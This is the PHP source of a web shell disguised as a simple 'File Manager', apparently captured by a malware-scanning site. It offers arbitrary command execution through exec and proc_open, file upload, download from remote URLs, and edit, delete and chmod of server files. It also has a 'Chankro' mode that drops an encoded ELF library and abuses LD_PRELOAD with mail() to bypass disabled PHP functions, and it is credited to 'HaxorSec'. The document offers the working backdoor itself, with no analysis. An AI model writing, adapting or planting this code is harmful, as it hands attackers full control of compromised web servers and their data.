session_start(); error_reporting(E_ALL); ini_set('display_errors', 1); $baseDir = __DIR__; $currentDir = isset($_GET['dir']) ? realpath($_GET['dir']) : $baseDir; if ($currentDir === false || !is_dir($currentDir)) { $currentDir = $baseDir; } if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['search_dir']) && !empty($_POST['dir_path'])) { $searchPath = realpath($_POST['dir_path']); if ($searchPath !== false && is_dir($searchPath)) { header('Location: ?dir=' . urlencode($searchPath)); exit; } else { $msg = 'Error: Invalid directory path'; } } function runTask($task, $dir) { if (function_exists('proc_open')) { $shell = '/bin/sh'; $descriptors = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = proc_open($shell, $descriptors, $pipes, $dir); if (is_resource($process)) { fwrite($pipes[0], $task . " 2>&1\n"); fclose($pipes[0]); $output = stream_get_contents($pipes[1]); fclose($pipes[1]); $error = stream_get_contents($pipes[2]); fclose($pipes[2]); proc_close($process); return "<pre>" . htmlspecialchars($output . $error) . "</pre>"; } } return "<font color='red'>Task execution failed or disabled!</font>"; } function runChankro($command, $dir) { $hook = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA4AcAAAAAAABAAAAAAAAAAPgZAAAAAAAAAAAAAEAAOAAHAEAAHQAcAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAoAAAAAAABsCgAAAAAAAAAAIAAAAAAAAQAAAAYAAAD4DQAAAAAAAPgNIAAAAAAA+A0gAAAAAABwAgAAAAAAAHgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAAB4CQAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA+A0AAAAAAAD4DSAAAAAAAPgNIAAAAAAACAIAAAAAAAAIAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAGhkFopFVPvXbYbBilBq7Sd8S1krAAAAAAMAAAANAAAAAQAAAAYAAACIwCBFAoRgGQ0AAAARAAAAEwAAAEJF1exgXb1c3muVgLvjknzYcVgcuY3xDurT7w4bn4gLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAASAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAALIAAAASAAAAAAAAAAAAAAAAAAAAAAAAAKMAAAASAAAAAAAAAAAAAAAAAAAAAAAAADgAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAFIAAAAiAAAAAAAAAAAAAAAAAAAAAAAAAJ4AAAASAAAAAAAAAAAAAAAAAAAAAAAAAMUAAAAQABcAaBAgAAAAAAAAAAAAAAAAAI0AAAASAAwAFAkAAAAAAAApAAAAAAAAAKgAAAASAAwAPQkAAAAAAAAdAAAAAAAAANgAAAAQABgAcBAgAAAAAAAAAAAAAAAAAMwAAAAQABgAaBAgAAAAAAAAAAAAAAAAABAAAAASAAkAGAcAAAAAAAAAAAAAAAAAABYAAAASAA0AXAkAAAAAAAAAAAAAAAAAAHUAAAASAAwA4AgAAAAAAAA0AAAAAAAAAABfX2dtb25fc3RhcnRfXwBfaW5pdABfZmluaQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX0lUTV9yZWdpc3RlclRNQ2xvbmVUYWJsZQBfX2N4YV9maW5hbGl6ZQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHB3bgBnZXRlbnYAY2htb2QAc3lzdGVtAGRhZW1vbml6ZQBzaWduYWwAZm9yawBleGl0AHByZWxvYWRtZQB1bnNldGVudgBsaWJjLnNvLjYAX2VkYXRhAF9fYnNzX3N0YXJ0AF9lbmQAR0xJQkNfMi4yLjUAAAAAAgAAAAIAAgAAAAIAAAACAAIAAAACAAIAAQABAAEAAQABAAEAAQABAAAAAAABAAEAuwAAABAAAAAAAAAAdRppCQAAAgDdAAAAAAAAAPgNIAAAAAAACAAAAAAAAACwCAAAAAAAAAgOIAAAAAAACAAAAAAAAABwCAAAAAAAAGAQIAAAAAAACAAAAAAAAABgECAAAAAAAAAOIAAAAAAAAQAAAA8AAAAAAAAAAAAAANgPIAAAAAAABgAAAAIAAAAAAAAAAAAAAOAPIAAAAAAABgAAAAUAAAAAAAAAAAAAAOgPIAAAAAAABgAAAAcAAAAAAAAAAAAAAPAPIAAAAAAABgAAAAoAAAAAAAAAAAAAAPgPIAAAAAAABgAAAAsAAAAAAAAAAAAAABgQIAAAAAAABwAAAAEAAAAAAAAAAAAAACAQIAAAAAAABwAAAA4AAAAAAAAAAAAAACgQIAAAAAAABwAAAAMAAAAAAAAAAAAAADAQIAAAAAAABwAAABQAAAAAAAAAAAAAADgQIAAAAAAABwAAAAQAAAAAAAAAAAAAAEAQIAAAAAAABwAAAAYAAAAAAAAAAAAAAEgQIAAAAAAABwAAAAgAAAAAAAAAAAAAAFAQIAAAAAAABwAAAAkAAAAAAAAAAAAAAFgQIAAAAAAABwAAAAwAAAAAAAAAAAAAAEiD7AhIiwW9CCAASIXAdAL/0EiDxAjDAP810gggAP8l1AggAA8fQAD/JdIIIABoAAAAAOng/////yXKCCAAaAEAAADp0P////8lwgggAGgCAAAA6cD/////JboIIABoAwAAAOmw/////yWyCCAAaAQAAADpoP////8lqgggAGgFAAAA6ZD/////JaIIIABoBgAAAOmA/////yWaCCAAaAcAAADpcP////8lkgggAGgIAAAA6WD/////JSIIIABmkAAAAAAAAAAASI09gQggAEiNBYEIIABVSCn4SInlSIP4DnYVSIsF1gcgAEiFwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABIBQAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABoFAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYHAAAAAAAAVgcAAAAAAABmBwAAAAAAAHYHAAAAAAAAhgcAAAAAAACWBwAAAAAAAKYHAAAAAAAAtgcAAAAAAADGBwAAAAAAAGAQIAAAAAAAR0NDOiAoRGViaWFuIDYuMy4wLTE4K2RlYjl1MSkgNi4zLjAgMjAxNzA1MTYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQDIAQAAAAAAAAAAAAAAAAAAAAAAAAMAAgDwAQAAAAAAAAAAAAAAAAAAAAAAAAMAAwA4AgAAAAAAAAAAAAAAAAAAAAAAAAMABAAwBAAAAAAAAAAAAAAAAAAAAAAAAAMABQAaBQAAAAAAAAAAAAAAAAAAAAAAAAMABgBIBQAAAAAAAAAAAAAAAAAAAAAAAAMABwBoBQAAAAAAAAAAAAAAAAAAAAAAAAMACABABgAAAAAAAAAAAAAAAAAAAAAAAAMACQAYBwAAAAAAAAAAAAAAAAAAAAAAAAMACgAwBwAAAAAAAAAAAAAAAAAAAAAAAAMACwDQBwAAAAAAAAAAAAAAAAAAAAAAAAMADADgBwAAAAAAAAAAAAAAAAAAAAAAAAMADQBcCQAAAAAAAAAAAAAAAAAAAAAAAAMADgBlCQAAAAAAAAAAAAAAAAAAAAAAAAMADwB4CQAAAAAAAAAAAAAAAAAAAAAAAAMAEACwCQAAAAAAAAAAAAAAAAAAAAAAAAMAEQD4DSAAAAAAAAAAAAAAAAAAAAAAAAMAEgAIDiAAAAAAAAAAAAAAAAAAAAAAAAMAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAMAFAAYDiAAAAAAAAAAAAAAAAAAAAAAAAMAFQDYDyAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAECAAAAAAAAAAAAAAAAAAAAAAAAMAFwBgECAAAAAAAAAAAAAAAAAAAAAAAAMAGABoECAAAAAAAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAGQAAAAIADADgBwAAAAAAAAAAAAAAAAAAGwAAAAIADAAgCAAAAAAAAAAAAAAAAAAALgAAAAIADABwCAAAAAAAAAAAAAAAAAAARAAAAAEAGABoECAAAAAAAAEAAAAAAAAAUwAAAAEAEgAIDiAAAAAAAAAAAAAAAAAAegAAAAIADACwCAAAAAAAAAAAAAAAAAAAhgAAAAEAEQD4DSAAAAAAAAAAAAAAAAAApQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAArAAAAAEAEABoCgAAAAAAAAAAAAAAAAAAugAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAxgAAAAEAFwBgECAAAAAAAAAAAAAAAAAA0wAAAAEAFAAYDiAAAAAAAAAAAAAAAAAA3AAAAAAADwB4CQAAAAAAAAAAAAAAAAAA7wAAAAEAFwBoECAAAAAAAAAAAAAAAAAA+wAAAAEAFgAAECAAAAAAAAAAAAAAAAAAEQEAABIAAAAAAAAAAAAAAAAAAAAAAAAAJQEAACAAAAAAAAAAAAAAAAAAAAAAAAAAQQEAABAAFwBoECAAAAAAAAAAAAAAAAAASAEAABIADAAUCQAAAAAAACkAAAAAAAAAUgEAABIADQBcCQAAAAAAAAAAAAAAAAAAWAEAABIAAAAAAAAAAAAAAAAAAAAAAAAAbAEAABIADADgCAAAAAAAADQAAAAAAAAAcAEAABIAAAAAAAAAAAAAAAAAAAAAAAAAhAEAACAAAAAAAAAAAAAAAAAAAAAAAAAAkwEAABIADAA9CQAAAAAAAB0AAAAAAAAAnQEAABAAGABwECAAAAAAAAAAAAAAAAAAogEAABAAGABoECAAAAAAAAAAAAAAAAAArgEAABIAAAAAAAAAAAAAAAAAAAAAAAAAwQEAACAAAAAAAAAAAAAAAAAAAAAAAAAA1QEAABIAAAAAAAAAAAAAAAAAAAAAAAAA6wEAABIAAAAAAAAAAAAAAAAAAAAAAAAA/QEAACAAAAAAAAAAAAAAAAAAAAAAAAAAFwIAACIAAAAAAAAAAAAAAAAAAAAAAAAAMwIAABIACQAYBwAAAAAAAAAAAAAAAAAAOQIAABIAAAAAAAAAAAAAAAAAAAAAAAAAAGNydHN0dWZmLmMAX19KQ1JfTElTVF9fAGRlcmVnaXN0ZXJfdG1fY2xvbmVzAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABjb21wbGV0ZWQuNjk3MgBfX2RvX2dsb2JhbF9kdG9yc19hdXhfZmluaV9hcnJheV9lbnRyeQBmcmFtZV9kdW1teQBfX2ZyYW1lX2R1bW15X2luaXRfYXJyYXlfZW50cnkAaG9vay5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kc29faGFuZGxlAF9EWU5BTUlDAF9fR05VX0VIX0ZSQU1FX0hEUgBfX1RNQ19FTkRfXwBfR0xPQkFMX09GRlNFVF9UQUJMRV8AZ2V0ZW52QEBHTElCQ18yLjIuNQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAGRhZW1vbml6ZQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AHB3bgBzaWduYWxAQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHByZWxvYWRtZQBfZW5kAF9fYnNzX3N0YXJ0AGNobW9kQEBHTElCQ18yLjIuNQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElBQkNfMi4yLjUAX2V4aXRAQEdMSUJDXzIuMi41AF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAX19jeGFfZmluYWxpemVAQEdMSUJDXzIuMi41AF9pbml0AGZvcmtAQEdMSUJDXzIuMi41AA=='; $cmdd = $command; $meterpreter = base64_encode($cmdd . " > test.txt"); $is_https = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443; $host = $_SERVER['HTTP_HOST']; $script_path = $_SERVER['SCRIPT_NAME']; $new_path = str_replace(basename($script_path), 'test.txt', $script_path); $full_url = ($is_https ? 'https://' : 'http://') . $host . $new_path; $viewCommandResult = '<hr><p>Result: <font color="black">base64: ' . $meterpreter . '</font><br>If no output appears, please check manually by opening <a href="' . $full_url . '">' . $full_url . '</a><br>Or you can check command with reverse shell script<br>Powered By @ HaxorSec</p>'; file_put_contents($dir . '/chankro.so', base64_decode($hook)); file_put_contents($dir . '/acpid.socket', base64_decode($meterpreter)); putenv('CHANKRO=' . $dir . '/acpid.socket'); putenv('LD_PRELOAD=' . $dir . '/chankro.so'); $output = ''; if (function_exists('mail')) { mail('a', 'a', 'a', 'a'); $output = $viewCommandResult; $content = @file_get_contents($full_url); if ($content !== false) { $output .= "<pre>" . htmlspecialchars($content) . "</pre>"; } } elseif (function_exists('mb_send_mail')) { mb_send_mail('a', 'a', 'a', 'a'); $output = $viewCommandResult; $content = @file_get_contents($full_url); if ($content !== false) { $output .= "<pre>" . htmlspecialchars($content) . "</pre>"; } } elseif (function_exists('error_log')) { error_log('a', 1, 'a'); $output = $viewCommandResult; $content = @file_get_contents($full_url); if ($content !== false) { $output .= "<pre>" . htmlspecialchars($content) . "</pre>"; } } elseif (function_exists('imap_mail')) { imap_mail('a', 'a', 'a'); $output = $viewCommandResult; $content = @file_get_contents($full_url); if ($content !== false) { $output .= "<pre>" . htmlspecialchars($content) . "</pre>"; } } else { $output = "<font color='red'>No bypass function available (mail, mb_send_mail, error_log, or imap_mail)!</font>"; } return $output; } function getFiles($dir) { $files = array_diff(scandir($dir), [, '..']); $result = []; foreach ($files as $file) { $path = $dir . '/' . $file; $result[] = [ 'name' => $file, 'type' => is_dir($path) ? 'dir' : 'file', 'size' => is_file($path) ? filesize($path) : 0, 'perm' => substr(sprintf('%o', fileperms($path)), -4) ]; } return $result; } function getBreadcrumb($baseDir, $currentDir) { $parts = array_filter(explode('/', $currentDir)); $path = ''; $crumb = ['<a href="?dir=' . urlencode($baseDir) . '">Home</a>']; foreach ($parts as $part) { $path .= '/' . $part; $crumb[] = '<a href="?dir=' . urlencode($path) . '">' . htmlspecialchars($part) . '</a>'; } return implode(' / ', $crumb); } $msg = ''; $cmdOutput = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_POST['search_dir'])) { try { if (isset($_POST['upload']) && isset($_FILES['file'])) { $file = $_FILES['file']; $target = $currentDir . '/' . basename($file['name']); if (move_uploaded_file($file['tmp_name'], $target)) { $msg = 'File uploaded successfully'; } else { $msg = 'Failed to upload file'; } } elseif (isset($_POST['url_upload']) && !empty($_POST['url']) && !empty($_POST['method'])) { $url = filter_var($_POST['url'], FILTER_SANITIZE_URL); $fileName = basename($url); $target = $currentDir . '/' . $fileName; if ($_POST['method'] === 'curl' && function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); if (file_put_contents($target, $data)) { $msg = 'File downloaded successfully via cURL'; } else { $msg = 'Failed to download file via cURL'; } } elseif ($_POST['method'] === 'wget') { $data = @file_get_contents($url); if ($data !== false && file_put_contents($target, $data)) { $msg = 'File downloaded successfully via wget (using file_get_contents)'; } else { $msg = 'Failed to download file via wget: file_get_contents not supported or invalid URL'; } } else { $msg = 'Selected method not available'; } } elseif (isset($_POST['rename']) && !empty($_POST['old_name']) && !empty($_POST['new_name'])) { $old = $currentDir . '/' . $_POST['old_name']; $new = $currentDir . '/' . $_POST['new_name']; if (rename($old, $new)) { $msg = 'Renamed successfully'; } else { $msg = 'Failed to rename'; } } elseif (isset($_POST['edit']) && !empty($_POST['file']) && isset($_POST['content'])) { $file = $currentDir . '/' . $_POST['file']; if (is_file($file) && file_put_contents($file, $_POST['content'])) { $msg = 'File edited successfully'; } else { $msg = 'Failed to edit file'; } header('Location: ?dir=' . urlencode($currentDir)); exit; } elseif (isset($_POST['chmod']) && !empty($_POST['file']) && !empty($_POST['perm'])) { $file = $currentDir . '/' . $_POST['file']; $perm = octdec($_POST['perm']); if (chmod($file, $perm)) { $msg = 'Permissions changed successfully'; } else { $msg = 'Failed to change permissions'; } } elseif (isset($_POST['delete']) && !empty($_POST['file'])) { $file = $currentDir . '/' . $_POST['file']; if (is_file($file) && unlink($file)) { $msg = 'File deleted successfully'; } elseif (is_dir($file) && rmdir($file)) { $msg = 'Folder deleted successfully'; } else { $msg = 'Failed to delete'; } } elseif (isset($_POST['command']) && !empty($_POST['command']) && !empty($_POST['cmd_method'])) { $command = trim($_POST['command']); if ($_POST['cmd_method'] === 'exec' && function_exists('exec')) { $output = []; $return_var = 0; exec($command . ' 2>&1', $output, $return_var); $cmdOutput = "<pre>" . htmlspecialchars(implode("\n", $output)) . "</pre>"; } elseif ($_POST['cmd_method'] === 'base64') { $encodedCommand = base64_encode($command); $decodedCommand = base64_decode($encodedCommand); if ($decodedCommand === $command) { $cmdOutput = runTask($command, $currentDir); } else { $cmdOutput = "<font color='red'>Base64 encoding/decoding error!</font>"; } } elseif ($_POST['cmd_method'] === 'chankro') { $cmdOutput = runChankro($command, $currentDir); } else { $cmdOutput = "<font color='red'>Selected command method is disabled on this server!</font>"; } } } catch (Exception $e) { $msg = 'Error: ' . $e->getMessage(); } } if (isset($_GET['get_content']) && is_file($currentDir . '/' . $_GET['get_content'])) {
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<title>Edit File - File Manager</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
textarea { width: 100%; height: 400px; }
.error { color: red; }
.success { color: green; }
</style>
</head>
<body>
<h2>Edit File: echo htmlspecialchars($_GET['get_content']);</h2>
if ($msg):
<p class="echo strpos($msg, 'success') !== false ? 'success' : 'error';">
echo htmlspecialchars($msg);
</p>
endif;
<form action="" method="post">
<input type="hidden" name="file" value="echo htmlspecialchars($_GET['get_content']);">
<textarea name="content">echo htmlspecialchars(file_get_contents($currentDir . '/' . $_GET['get_content']));</textarea>
<input type="submit" name="edit" value="Save">
</form>
<a href="?dir=echo urlencode($currentDir);">Back to File Manager</a>
</body>
</html>
exit; }
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<title>File Manager</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
table { border-collapse: collapse; width: 100%; }
th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
th { background-color: #f2f2f2; }
.error { color: red; }
.success { color: green; }
.breadcrumb { margin-bottom: 10px; }
textarea { width: 100%; height: 200px; }
.action-form { display: inline-block; margin-right: 5px; }
input[type="text"] { width: 100px; }
</style>
</head>
<body>
<h2>File Manager</h2>
<div class="breadcrumb">echo getBreadcrumb($baseDir, $currentDir);</div>
if ($msg):
<p class="echo strpos($msg, 'success') !== false ? 'success' : 'error';">
echo htmlspecialchars($msg);
</p>
endif;
<h3>Search Directory</h3>
<form action="" method="post">
<input type="text" name="dir_path" placeholder="Enter directory path (e.g., /home/u131317956/domains/unzah.com/public_html)" style="width: 300px;">
<input type="submit" name="search_dir" value="Search">
</form>
<h3>Upload File</h3>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" name="upload" value="Upload">
</form>
<form action="" method="post">
<input type="url" name="url" placeholder="Enter URL" style="width: 300px;">
<select name="method">
<option value="curl">cURL</option>
<option value="wget">wget (file_get_contents)</option>
</select>
<input type="submit" name="url_upload" value="Download">
</form>
<h3>System Command</h3>
<form action="" method="post">
<input type="text" name="command" style="width: 300px;" placeholder="Enter command (e.g., ls -la, export RHOST=...)">
<select name="cmd_method">
<option value="exec">exec</option>
<option value="base64">base64 (proc_open)</option>
<option value="chankro">Chankro</option>
</select>
<input type="submit" value="Execute">
</form>
if ($cmdOutput):
echo $cmdOutput;
endif;
<div style="margin-bottom: 20px;"></div>
<table>
<tr><th>Name</th><th>Type</th><th>Size</th><th>Permissions</th><th>Actions</th></tr>
foreach (getFiles($currentDir) as $item):
<tr>
<td>
if ($item['type'] === 'dir'):
<a href="?dir=echo urlencode($currentDir . '/' . $item['name']);">
echo htmlspecialchars($item['name']);
</a>
else:
echo htmlspecialchars($item['name']);
endif;
</td>
<td>echo $item['type'];</td>
<td>echo $item['size'] ? number_format($item['size']) . ' bytes' : '-';</td>
<td>echo $item['perm'];</td>
<td>
<form action="" method="post" class="action-form">
<input type="hidden" name="file" value="echo htmlspecialchars($item['name']);">
<input type="submit" name="delete" value="Delete">
</form>
<form action="" method="post" class="action-form">
<input type="hidden" name="old_name" value="echo htmlspecialchars($item['name']);">
<input type="text" name="new_name" value="echo htmlspecialchars($item['name']);" style="width: 80px;">
<input type="submit" name="rename" value="Rename">
</form>
<form action="" method="post" class="action-form">
<input type="hidden" name="file" value="echo htmlspecialchars($item['name']);">
<input type="text" name="perm" value="echo $item['perm'];" style="width: 50px;" placeholder="0755">
<input type="submit" name="chmod" value="Chmod">
</form>
if ($item['type'] === 'file'):
<a href="?get_content=echo urlencode($item['name']);&dir=echo urlencode($currentDir);">
<button>Edit</button>
</a>
endif;
</td>
</tr>
endforeach;
</table>
</body>
</html>© 2023 Quttera Ltd. All rights reserved.